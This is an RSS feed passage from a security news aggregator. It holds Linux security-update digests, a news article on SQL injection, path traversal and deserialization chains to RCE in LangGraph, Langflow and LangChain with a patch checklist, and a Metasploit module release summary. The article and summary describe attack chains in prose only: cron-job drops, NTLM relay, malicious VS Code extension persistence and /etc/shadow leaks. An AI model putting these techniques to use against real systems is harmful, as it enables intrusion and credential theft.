python-base, python-doc, python311-pdm, python311-py7zr, python311-pypdf, python36, tar, trivy, util-linux, xen, and xtrabackup).]]></content:encoded>
</item>
<item>
<title><![CDATA[Live, zero-config Redis traffic profiler built on eBPF. Reads plaintext and TLS, no app changes.]]></title>
<description><![CDATA[submitted by    /u/R_E_T_R_O   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3626178/linux-tipps/live-zero-config-redis-traffic-profiler-built-on-ebpf-reads-plaintext-and-tls-no-app-changes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626178/linux-tipps/live-zero-config-redis-traffic-profiler-built-on-ebpf-reads-plaintext-and-tls-no-app-changes/</guid>
<pubDate>Fri, 26 Jun 2026 04:26:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/R_E_T_R_O"> /u/R_E_T_R_O </a> <br> <span><a href="https://github.com/yeet-src/redissnoop">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ufryzz/live_zeroconfig_redis_traffic_profiler_built_on/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), Debian (cloud-init, postgresql-13, and yelp), Mageia (nats-server), Oracle (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, ex...]]></description>
<link>https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 25 Jun 2026 15:25:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), <b>Debian</b> (cloud-init, postgresql-13, and yelp), <b>Mageia</b> (nats-server), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, expat, flatpak, freerdp, gimp, golang, grafana, grafana-pcp, httpd, jmc, jq, kernel, libsndfile, libsoup, libtiff, mod_http2, mysql:8.0, nginx, nginx:1.24, openexr, php:8.2, poppler, pyOpenSSL, python-markdown, redis:7, samba, thunderbird, tigervnc, unbound, and vim), <b>Red Hat</b> (libpng, libpng12, and libpng15), <b>SUSE</b> (apptainer, bind, crun, freeipmi, ghc-crypton-x509-store, ghc-crypton-x509-system, google-guest-agent, google-osconfig-agent, GraphicsMagick, gstreamer-plugins-bad, hamlib, iproute2, java-1_8_0-openjdk, kubevirt1, libarchive, libheif, libpng15, mbedtls, mbedtls-2, openssl-1_1, python-biopython, python-PyJWT, tar, webkit2gtk3, and xen), and <b>Ubuntu</b> (ffmpeg, libdbi-perl, and perl).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, firefox, kernel, kernel-rt, libpq, memcached, postgresql, postgresql16, postgresql:13, postgresql:16, python-urllib3, python3.14-urllib3, redis:6, skopeo, and vim), Debian (beets, gst-plugins-bad1.0, imagemagick, libmatio, python-urllib3, ...]]></description>
<link>https://tsecurity.de/de/3621514/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621514/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 24 Jun 2026 15:25:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, firefox, kernel, kernel-rt, libpq, memcached, postgresql, postgresql16, postgresql:13, postgresql:16, python-urllib3, python3.14-urllib3, redis:6, skopeo, and vim), <b>Debian</b> (beets, gst-plugins-bad1.0, imagemagick, libmatio, python-urllib3, and u-boot), <b>Fedora</b> (chromium, coturn, frr, grout, materialx, perl-Crypt-DSA, and yt-dlp), <b>Mageia</b> (opensc, perl-Archive-Tar, and podofo), <b>Oracle</b> (fence-agents, libpq, mysql:8.4, and postgresql:16), <b>Red Hat</b> (firefox, libpng, libpng12, libpng15, libreoffice, nginx:1.24, thunderbird, tigervnc, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Slackware</b> (libarchive), <b>SUSE</b> (amazon-ssm-agent, ansible-core, apache2, bind, bitcoin-qt6, containerized-data-importer, curl, distribution, docker-stable, dovecot24, dracut, editorconfig-core-c, exiv2, firefox, freeipmi, freerdp, ghc-aws, ghc-crypton-asn1-encoding, ghc-crypton-asn1-parse, ghc-crypton-asn1-types, ghc-crypton-pem, glib-networking, go1.25, go1.26, google-guest-agent, graphite2, hamlib, helm, himmelblau, ignition, ImageMagick, kernel, ldns, libarchive, libcaca, libheif, libinput, libjxl, libsolv, libzypp, zypper, LibVNCServer, libxslt, libyang, mcphost, mozjs128, ncurses, nginx, opensc, openssl-3, openvswitch, papers, perl-HTML-Parser, perl-HTTP-Daemon, perl-Protocol-HTTP2, podman, postgresql14, postgresql15, postgresql16, postgresql17, python-aiohttp, python-ecdsa, python-paramiko, python-PyJWT, python-starlette, rekor, sqlite3, strongswan, tiff, tomcat, tomcat10, tomcat11, unbound, webkit2gtk3, xwayland, and zypper, libzypp, libsolv), and <b>Ubuntu</b> (libcap2, libnfs, libvncserver, libxml2, and mysql-8.0).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ffmpeg), Fedora (erlang, ffmpeg, prometheus, python-scrapy, python3-docs, python3.14, thorvg, tigervnc, and vips), Mageia (mumble and sslh), Oracle (389-ds:1.4, dracut, firefox, hplip, kernel, openssh, postgresql:15, redis:6, and uek-kernel), Red Hat (...]]></description>
<link>https://tsecurity.de/de/3618375/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618375/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 23 Jun 2026 15:10:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ffmpeg), <b>Fedora</b> (erlang, ffmpeg, prometheus, python-scrapy, python3-docs, python3.14, thorvg, tigervnc, and vips), <b>Mageia</b> (mumble and sslh), <b>Oracle</b> (389-ds:1.4, dracut, firefox, hplip, kernel, openssh, postgresql:15, redis:6, and uek-kernel), <b>Red Hat</b> (delve, gvisor-tap-vsock, nginx, nginx:1.24, nginx:1.26, osbuild-composer, podman, rhc, skopeo, and yggdrasil), <b>SUSE</b> (containerized-data-importer, graphite2, kernel, libarchive, openssh, openssh-askpass-gnome, openvswitch, openvswitch3, postfix, python-lxml, python-nltk, python-python-multipart, python-urllib3, rmt-server, terraform-provider-local, terraform-provider-null, and util-linux), and <b>Ubuntu</b> (google-guest-agent, haproxy, libxml2, linux-azure, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oracle-5.15, mysql-8.0, mysql-8.4, and nginx).]]></content:encoded>
</item>
<item>
<title><![CDATA[v23.46.4]]></title>
<description><![CDATA[23.46.4 - 2026-06-23
Bug Fixes

store the mtime in the redis nvticache for backward compatibility (#2243) 4c2ea461]]></description>
<link>https://tsecurity.de/de/3618088/downloads/v23464/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618088/downloads/v23464/</guid>
<pubDate>Tue, 23 Jun 2026 13:31:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/greenbone/openvas-scanner/compare/v23.46.3...v23.46.4">23.46.4</a> - 2026-06-23</h2>
<h2>Bug Fixes</h2>
<ul>
<li>store the mtime in the redis nvticache for backward compatibility (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4633674043" data-permission-text="Title is private" data-url="https://github.com/greenbone/openvas-scanner/issues/2243" data-hovercard-type="pull_request" data-hovercard-url="/greenbone/openvas-scanner/pull/2243/hovercard" href="https://github.com/greenbone/openvas-scanner/pull/2243">#2243</a>) <a href="https://github.com/greenbone/openvas-scanner/commit/4c2ea461">4c2ea461</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[7,000 Langflow servers are under attack. LangGraph and LangChain have the same holes]]></title>
<description><![CDATA[Your AI agent did exactly what it was designed to do. The framework underneath it just handed an attacker a shell on the box that holds your OpenAI key, your database credentials, and your CRM tokens.That is not a hypothetical. In a few months, three of the most widely deployed AI agent framework...]]></description>
<link>https://tsecurity.de/de/3611334/it-nachrichten/7000-langflow-servers-are-under-attack-langgraph-and-langchain-have-the-same-holes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611334/it-nachrichten/7000-langflow-servers-are-under-attack-langgraph-and-langchain-have-the-same-holes/</guid>
<pubDate>Fri, 19 Jun 2026 23:31:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Your AI agent did exactly what it was designed to do. The framework underneath it just handed an attacker a shell on the box that holds your OpenAI key, your database credentials, and your CRM tokens.</p><p>That is not a hypothetical. In a few months, three of the most widely deployed AI agent frameworks each turned a known, ordinary bug class into a way through. <a href="https://research.checkpoint.com/2026/from-sqli-to-rce-exploiting-langgraphs-checkpointer/">Check Point Research</a> chained a SQL injection in LangGraph’s SQLite checkpointer to full remote code execution. Tenable and VulnCheck tracked a path traversal in Langflow’s file upload endpoint to active, in-the-wild RCE. <a href="https://www.cyera.com/research/langdrained-3-paths-to-your-data-through-the-worlds-most-popular-ai-framework">Cyera</a> documented a path traversal in LangChain-core’s prompt loader that reads your secrets off disk. Two paths to a shell, one to your keys. They are the same bug, wearing three frameworks.</p><p>These frameworks became production infrastructure faster than anyone secured them. They store agent state, take file uploads, load prompt configs, and hold the credentials to databases, CRMs, and internal APIs. The edge tools watch traffic. The endpoint tools watch processes. Neither was built to treat an imported framework as a boundary worth guarding, and that blind spot is exactly where all three chains live, widening every week as these frameworks ship to production.</p><h2><b>The LangGraph chain, SQL injection to a Python shell</b></h2><p>Start with the one most teams pulled into production this quarter. LangGraph gives AI agents memory through checkpointers, the persistence layer that stores execution state. It has cleared over 50 million downloads a month. Yarden Porat of Check Point Research took that layer apart and found three vulnerabilities. Two of them chain to RCE.</p><p><a href="https://advisories.gitlab.com/pypi/langgraph-checkpoint-sqlite/CVE-2025-67644/">CVE-2025-67644</a>, rated CVSS 7.3, is a SQL injection in the SQLite checkpointer. The function that builds the WHERE clause for checkpoint lookups drops user-controlled filter keys straight into the query with no parameterization and no escaping. This does not hit everyone, but where it hits, it is serious. A deployment is exposed when it self-hosts LangGraph on the SQLite or Redis checkpointer and lets untrusted input reach get_state_history() or a similar history endpoint. Meet those conditions, and an attacker who controls the filter writes a fabricated row straight into the checkpoint table. Run LangChain’s managed LangSmith platform on PostgreSQL, and the exposure is gone.</p><p>Then <a href="https://advisories.gitlab.com/pypi/langgraph/CVE-2026-28277/">CVE-2026-28277</a>, CVSS 6.8, finishes the job. LangGraph’s msgpack checkpoint decoder rebuilds Python objects from the stored data, which lets it import a module and call a named function with attacker-supplied arguments. That step needs write access to the checkpoint store; the SQL injection is what grants it remotely. LangGraph loads the forged row as a legitimate checkpoint, the decoder runs the specified function, including os.system, and code executes under the identity of the agent server. A third issue, CVE-2026-27022, CVSS 6.5, reaches the same place through the Redis checkpointer.</p><p>There has been no confirmed exploitation in the wild yet. A working proof-of-concept is public in Check Point’s disclosure. The fixes are version bumps: langgraph-checkpoint-sqlite to 3.0.1, langgraph to 1.0.10, and langgraph-checkpoint-redis to 1.0.2.</p><h2><b>The Langflow chain, one unauthenticated request to RCE</b></h2><p>Langflow is the one already under attack. CVE-2026-5027, CVSS 8.8, is a path traversal in the POST /api/v2/files endpoint, which takes the filename straight from the form data and writes it to disk unsanitized. An attacker packs that filename with traversal sequences and drops a file anywhere, such as a cron job in /etc/cron.d/. Because Langflow ships with auto-login enabled in its default configuration, an exposed instance needs no credentials at all. A single unauthenticated request reaches the endpoint, and the next cron run hands over a shell.</p><p>VulnCheck’s Caitlin Condon confirmed exploitation on June 9: “Our Canaries observed exploitation of CVE-2026-5027 that successfully leveraged the path traversal to write what appear to be test files on victim systems.” Censys put roughly 7,000 exposed instances on the internet, most in North America. This is the third Langflow flaw to draw active exploitation this year, after <a href="https://www.probablypwned.com/article/langflow-cve-2025-34291-muddywater-account-takeover-rce">CVE-2025-34291</a>, which the Iranian state-sponsored group MuddyWater weaponized and which CISA added to its <a href="https://thehackernews.com/2026/05/cisa-adds-exploited-langflow-and-trend.html">Known Exploited Vulnerabilities catalog</a> in May. CVE-2026-5027 itself was patched in version 1.9.0, released April 15.</p><p>The timeline is what sets the clock. The patch shipped April 15. Attacks started in June, and <a href="https://www.thestack.technology/langflow-instances-are-getting-exploited-again/">VulnCheck added CVE-2026-5027 to its exploited-vulnerabilities list June 8</a> once its sensors caught the first in-the-wild hits. Every instance left unpatched between those two dates has been sitting in the open for almost two months. The lesson for security teams is to start the patch clock at disclosure, not at a federal catalog entry.</p><h2><b>The LangChain-core gap, arbitrary file reads through the prompt loader</b></h2><p>LangChain-core, the foundation under both, disclosed <a href="https://thehackernews.com/2026/03/langchain-langgraph-flaws-expose-files.html">CVE-2026-34070</a>, CVSS 7.5, a path traversal in its legacy prompt-loading API. The load_prompt() functions read a file path out of a config dict with no check against traversal sequences or absolute paths, so an attacker who influences that path reads arbitrary files the process can reach, including the .env file holding OPENAI_API_KEY and ANTHROPIC_API_KEY. Cyera paired it with CVE-2025-68664, CVSS 9.3, a deserialization flaw that resolves environment secrets through a crafted object. The fix versions differ, which matters when you patch: CVE-2026-34070 lands in <a href="https://security.snyk.io/vuln/SNYK-PYTHON-LANGCHAINCORE-15809257">langchain-core 1.2.22 and 0.3.86</a>; CVE-2025-68664 lands earlier in <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-68664">1.2.5 and 0.3.81</a>. Clear both, or the higher-severity flaw stays live behind a patched one.</p><p>Three frameworks, three classic AppSec bugs. Path traversal. SQL injection. Unsafe deserialization. Nothing exotic, nothing AI-specific, just old vulnerabilities living inside new infrastructure. None of this is a frontier-model problem. It is plumbing, sitting in the layer where AI meets the enterprise.</p><h2><b>Why the scanner cannot see it</b></h2><p>Merritt Baer, CSO at <a href="https://www.enkryptai.com/">Enkrypt AI</a> and former deputy CISO at AWS, has named what makes this kind of failure hard to see coming. It does not announce itself as an AI problem. "CISOs will experience MCP insecurity not in the abstract, but when an employee pastes sensitive data into a tool, or when an attacker finds an unauthenticated MCP server in your cloud," Baer told VentureBeat. "It won't feel like 'AI risk.' It will feel like your traditional security program failing." The framework chains here are the same shape. An exposed Langflow instance is an unauthenticated server in your cloud, and the alert, if one fires, reads like an ordinary incident.</p><p>That is the gap in one sentence. The exploit lives in the framework your code imports. The WAF never sees a msgpack decoder running three layers down. The EDR watches the agent server make the same process calls it makes a thousand times a day and waves it through. Both tools are doing their job. Nobody scoped the framework itself as the thing that could turn on you. </p><p>The root cause is older than AI, and Baer names it. “MCP is shipping with the same mistake we’ve seen in every major protocol rollout: insecure defaults,” she told VentureBeat. “If we don’t build authentication and least privilege in from day one, we’ll be cleaning up breaches for the next decade.” Langflow’s auto-login is that mistake shipped. LangChain-core’s unguarded prompt loader is that mistake shipped. The convenient default is the vulnerability. And the moment an agent connects to anything, that risk compounds. “You’re not just trusting your own security, you’re inheriting the hygiene of every tool, every credential, every developer in that chain,” Baer said. “That’s a supply chain risk in real time.”</p><p>There is a governance failure layered on top of the technical one, and it is the same miscategorization Assaf Keren, chief security officer at Qualtrics and former CISO at PayPal, has flagged in adjacent tooling. “Most security teams still classify experience management platforms as ‘survey tools,’ which sit in the same risk tier as a project management app,” Keren told VentureBeat. “This is a massive miscategorization.” Swap in AI agent frameworks, and it still holds. Teams file LangGraph, Langflow, and LangChain under developer convenience, then wire them into databases, CRMs, and provider keys. “Security has to be an enabler,” Keren said, “or teams route around it.” These frameworks are what routing around it looks like.</p><p>Follow the money and it points at the same layer. On its <a href="https://www.fool.com/earnings/call-transcripts/2026/06/03/crowdstrike-crwd-q1-2027-earnings-transcript/">Q1 fiscal 2027 earnings call</a>, CrowdStrike reported its AI detection and response line up more than 250% sequentially, and on June 17 it <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-advances-ai-and-cloud-security-operations-on-aws/">extended that runtime coverage</a> to agent, LLM, and MCP traffic on AWS. George Kurtz, the company’s co-founder and CEO, named the reason in plain terms: “Agents run on the endpoint. They make tool calls, access files, invoke APIs, and move data at the process level.” That is the exact plumbing these chains abuse, and real money is now moving to the layer your AppSec scan skips.</p><h2><b>What to put in front of the board</b></h2><p>The board does not need the CVE numbers. It needs the consequence, and Keren draws the line the board cares about. Most teams have mapped the technical blast radius. “But not the business blast radius,” Keren told VentureBeat. “When an AI engine triggers a compensation adjustment based on poisoned data, the damage is not a security incident. It is a wrong business decision executed at machine speed.” A framework RCE is the same problem one layer earlier. The agent does not just leak a credential; it acts on production systems with it, and the business sees an outcome no one can explain.</p><p>So frame it the way a board frames it: we run AI agent frameworks in production that can be turned into remote shells through bugs our scanners are not built to find, all three are patched, one is under active attack, and here is the date every instance is verified and closed. None of this required custom malware or a zero-day.</p><h2><b>The six-question checklist</b></h2><p>Six trust boundaries, one per row, each with the question, the proof point, the command, the fix, and the board line. Run it tonight.</p><table><tbody><tr><td><p><b>Trust-Boundary Question</b></p></td><td><p><b>Proof Point</b></p></td><td><p><b>What Broke</b></p></td><td><p><b>Verify Before You Install</b></p></td><td><p><b>The Fix</b></p></td><td><p><b>Board Language</b></p></td></tr><tr><td><p><b>1. Can the agent's state store be poisoned with code?</b></p></td><td><p>LangGraph SQLi-to-RCE chain. CVE-2025-67644 (CVSS 7.3) chains into CVE-2026-28277 (CVSS 6.8). PoC public, no in-the-wild use yet.</p></td><td><p>Filter keys interpolated into SQL with an f-string. Forged checkpoint row hits the msgpack decoder, which imports and runs an attacker-named callable.</p></td><td><p>pip show langgraph-checkpoint-sqlite. Below 3.0.1 = vulnerable. Confirm get_state_history() is not exposed to network input.</p></td><td><p>Upgrade langgraph-checkpoint-sqlite to 3.0.1, langgraph to 1.0.10, langgraph-checkpoint-redis to 1.0.2.</p></td><td><p>“Our agent memory layer can be tricked into running attacker code. Vendor has patched it. We are upgrading and confirming the endpoint is not exposed.”</p></td></tr><tr><td><p><b>2. Can an unauthenticated request write a file to our agent server?</b></p></td><td><p>Langflow CVE-2026-5027 (CVSS 8.8). On VulnCheck KEV (June 8). Active exploitation confirmed June 9. ~7,000 exposed instances (Censys).</p></td><td><p>Path traversal in POST /api/v2/files. Filename unsanitized. Auto-login on by default. Two HTTP calls drop a cron job and earn a shell.</p></td><td><p>Query Censys or Shodan for your Langflow, Flowise, n8n, and Dify instances on the perimeter. Check whether auto-login is enabled.</p></td><td><p>Upgrade Langflow to 1.9.0+. Disable auto-login. Pull AI dev tools behind VPN or zero-trust. Isolate port 7860.</p></td><td><p>“Our AI dev tools are reachable from the internet with login off. This exact flaw is under active attack now. We are pulling them behind access controls today.”</p></td></tr><tr><td><p><b>3. Can our prompt loader read files it should never touch?</b></p></td><td><p>LangChain-core CVE-2026-34070 (CVSS 7.5), path traversal in the prompt-loading API. Paired with deserialization CVE-2025-68664 (CVSS 9.3).</p></td><td><p>load_prompt() reads a config-supplied path with no traversal check, returning files such as the .env holding OPENAI_API_KEY and ANTHROPIC_API_KEY.</p></td><td><p>pip show langchain-core. Below 1.2.22 (1.x) or 0.3.86 (0.x) = vulnerable. Audit any code passing user-influenced paths to load_prompt().</p></td><td><p>Upgrade langchain-core past both fixes: 1.2.22 / 0.3.86 (CVE-2026-34070) and 1.2.5 / 0.3.81 (CVE-2025-68664). Replace load_prompt() with an allowlisted directory. Run as non-root.</p></td><td><p>“Our prompt system could be steered to read our API keys off disk. We are patching and removing the legacy loader.”</p></td></tr><tr><td><p><b>4. Does a compromised framework hand over every credential at once?</b></p></td><td><p>These frameworks are often deployed with provider keys, database credentials, and integration tokens available to the process environment. Cyera documents the credential-exfiltration path.</p></td><td><p>One RCE on the agent server exposes every secret the process can read. Blast radius is the full credential set, not one app.</p></td><td><p>Inventory which secrets each framework process can reach. Confirm keys come from a secrets manager, not static .env files.</p></td><td><p>Move provider keys to ephemeral injection. Rotate any key a vulnerable instance could have read. Scope each key to least privilege.</p></td><td><p>“A single break in one AI framework exposes the keys to every model and data store it touches. We are rotating and scoping them now.”</p></td></tr><tr><td><p><b>5. Are these frameworks running outside security governance?</b></p></td><td><p>A prior Langflow flaw, CVE-2025-34291, was weaponized by Iranian-linked MuddyWater and added to CISA KEV in May. Shadow AI is the new shadow IT.</p></td><td><p>Teams stand frameworks up for speed, give them credentials, and never bring them under review. The security team cannot see what it does not know exists.</p></td><td><p>Run a discovery sweep for AI frameworks outside change management. Map each to an owner and an approval record.</p></td><td><p>Assign every framework a documented owner and a place in the approval process. Offer a sanctioned alternative so teams do not route around you.</p></td><td><p>“We have AI frameworks in production that no one formally approved. We are bringing them under governance, not banning them.”</p></td></tr><tr><td><p><b>6. Can our scanners even see inside the framework at runtime?</b></p></td><td><p>Runtime detection is forming around this layer: CrowdStrike Falcon AIDR expanded to AWS June 17 (Bedrock, Kiro, Strands); its <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-expands-project-quiltworks-with-aws-hardening-the-cloud-attack-surface-against-frontier-ai-risk/">QuiltWorks coalition</a> now covers cloud workloads.</p></td><td><p>WAF reads HTTP at the edge. EDR watches the endpoint. By default, neither reliably models a msgpack decoder or a prompt loader three layers down in an imported framework as a separate trust boundary.</p></td><td><p>Test whether your AppSec scan covers third-party framework internals. Track CVEs by dependency, not just by what your edge tools can parse.</p></td><td><p>Add framework dependencies to vuln management. Treat agent output and stored state as untrusted. Patch on disclosure, not on KEV listing.</p></td><td><p>“Our scanners check our code, not the frameworks our code imports. We are closing that blind spot and patching on disclosure, not waiting for the federal catalog.”</p></td></tr></tbody></table><p><i>How to read this table: each row is one trust boundary, left to right, from the question to ask to the line to read your board.</i></p><h2><b>Give the board the deadline, not the technology</b></h2><p>The fixes are not a re-architecture. They are version bumps and config changes you can land this week. The exposure is the gap between the day the patch shipped and the day your team runs the checks, and right now that gap is measured in months. The frameworks did exactly what they were built to do. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: NTLM Relay Priv Esc, MCP Server Integration, Paperclip AI RCE Chain, and more]]></title>
<description><![CDATA[This week's release includes five new modules, including a full unauthenticated RCE chain for Paperclip AI and a VS Code extension persistence technique. On the post-exploitation side, the new windows/local/ntlm_relay_2_self module coerces the local machine account to authenticate via OpenEncrypt...]]></description>
<link>https://tsecurity.de/de/3611053/it-security-nachrichten/weekly-metasploit-update-ntlm-relay-priv-esc-mcp-server-integration-paperclip-ai-rce-chain-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611053/it-security-nachrichten/weekly-metasploit-update-ntlm-relay-priv-esc-mcp-server-integration-paperclip-ai-rce-chain-and-more/</guid>
<pubDate>Fri, 19 Jun 2026 19:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week's release includes five new modules, including a full unauthenticated RCE chain for Paperclip AI and a VS Code extension persistence technique. On the post-exploitation side, the new <span data-type="inlineCode">windows/local/ntlm_relay_2_self</span> module coerces the local machine account to authenticate via OpenEncryptedFileRaw (WebDAV), relays that NTLM authentication to a Domain Controller's LDAP service, then uses the resulting LDAP session to write Shadow Credentials and obtain a Kerberos service ticket as Administrator via S4U2Proxy, enabling PsExec back to itself for SYSTEM access.</p><p>On the enhancement side, the new MCP server plugin lets AI tools assist operators directly within a running msfconsole instance, and module check codes now return richer detail for users.</p><h2>New module content (5)</h2><h3>Paperclip AI RCE using a chain of six API calls (CVE-2026-41679)</h3><p>Authors: Sagilayani <a href="https://github.com/sagilayani">https://github.com/sagilayani</a> and h00die-gr3y <a href="mailto:h00die.gr3y@gmail.com">h00die.gr3y@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21547">#21547</a> contributed by <a href="https://github.com/h00die-gr3y">h00die-gr3y</a></p><p>Path: <span data-type="inlineCode">linux/http/paperclipai_unauth_rce_cve_2026_41679</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41679&amp;referrer=blog">CVE-2026-41679</a></p><p>Description: Adds an exploit module for CVE-2026-41679 which exploits Paperclip. An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip instance running in authenticated mode with default configuration. The entire chain is six API calls.</p><h3>Xerte Online Toolkits Arbitrary File Upload - Unauthenticated Media Upload</h3><p>Author: bootstrapbool <a href="mailto:bootstrapbool@gmail.com">bootstrapbool@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21371">#21371</a> contributed by <a href="https://github.com/bootstrapbool">bootstrapbool</a></p><p>Path: <span data-type="inlineCode">multi/http/xerte_unauthenticated_mediaupload</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41459&amp;referrer=blog">CVE-2026-41459</a></p><p>Description: Exploits authentication failure (<span data-type="inlineCode">CVE-2026-34413</span>), extension blacklist (<span data-type="inlineCode">CVE-2026-34415</span>), and path traversal (<span data-type="inlineCode">CVE-2026-34414</span>) vulnerabilities in Xerte Online Toolkits versions 3.15 and earlier.</p><h3>VS Code Extension Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21465">#21465</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: <span data-type="inlineCode">multi/persistence/vscode_extension</span></p><p>Description: Adds a new persistence module that achieves persistence by installing a malicious extension into a user's VS Code extensions directory. The next time the target opens VS Code, the extension executes and delivers a shell back to the attacker.</p><h3>NTLM Relay to Self (HTTP to LDAP) - Post Exploitation</h3><p>Author: jheysel-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21430">#21430</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: windows/local/ntlm_relay_2_self</p><p>Description: Adds a module that exploits the NTLMRelay2Self attack. It requires a low-privilege user session on a Windows host.</p><h3>Linux Kernel __ptrace_may_access() Exit Race Change File Disclosure</h3><p>Authors: 0xdeadbeefnetwork and bhaskarbhar</p><p>Type: Post</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21472">#21472</a> contributed by <a href="https://github.com/bhaskarbhar">bhaskarbhar</a></p><p>Path: <span data-type="inlineCode">linux/gather/cve_2026_46333_chage</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-46333&amp;referrer=blog">CVE-2026-46333</a></p><p>Description: Adds a post module that leverages CVE-2026-46333, a vulnerability in the Linux kernel whereby a race condition exists when tearing down a process. A local attacker can exploit this to obtain file handles they would not otherwise have access to. In the exploit, this is leveraged to leak the contents of the /etc/shadow file.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21254">#21254</a> from <a href="https://github.com/golem445">golem445</a> - Nmap imports will include domain name if supplied by the user for the scan.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21259">#21259</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds a number of enhancements to msfconsole's search functionality by cleaning up some inconsistencies and giving users the option to hide the child elements of search results with the <span data-type="inlineCode">-c</span> flag. Also introduces two global options, <span data-type="inlineCode">SearchSort</span> and <span data-type="inlineCode">SearchChildMode</span>, that users can set and forget in order to control ascending/descending search results and whether or not child items appear under search results respectively.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21367">#21367</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds a number of enhancements to the <span data-type="inlineCode">rexec_login</span> module including more detailed output, a check for an rDNS failure, an update to the module description, and removal of duplicate IP:PORT printing.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21454">#21454</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates many modules by adding additional details to the check codes that are returned by the #check method, which provides additional information for the user. Also updates the requirements of new modules to contain this extra information moving forward.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21512">#21512</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates the Metasploit MCP tool to expose note information on Metasploit modules, as well as host comments.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21537">#21537</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Adds a plugin to start and stop a Model Context Protocol (<span data-type="inlineCode">MCP</span>) server within msfconsole. When compared to the standalone <span data-type="inlineCode">msfmcpd</span> tool, this has the significant advantage of automatically loading the RPC server within the context of a running framework instance which enables AI tools to assist the operator without needing to restart Metasploit.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21542">#21542</a> from <a href="https://github.com/h00die">h00die</a> - Updates the <span data-type="inlineCode">scanner/redis/redis_server</span> module to output server INFO details as a readable table.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21441">#21441</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Improves the <span data-type="inlineCode">MCP</span> server lifecycle control 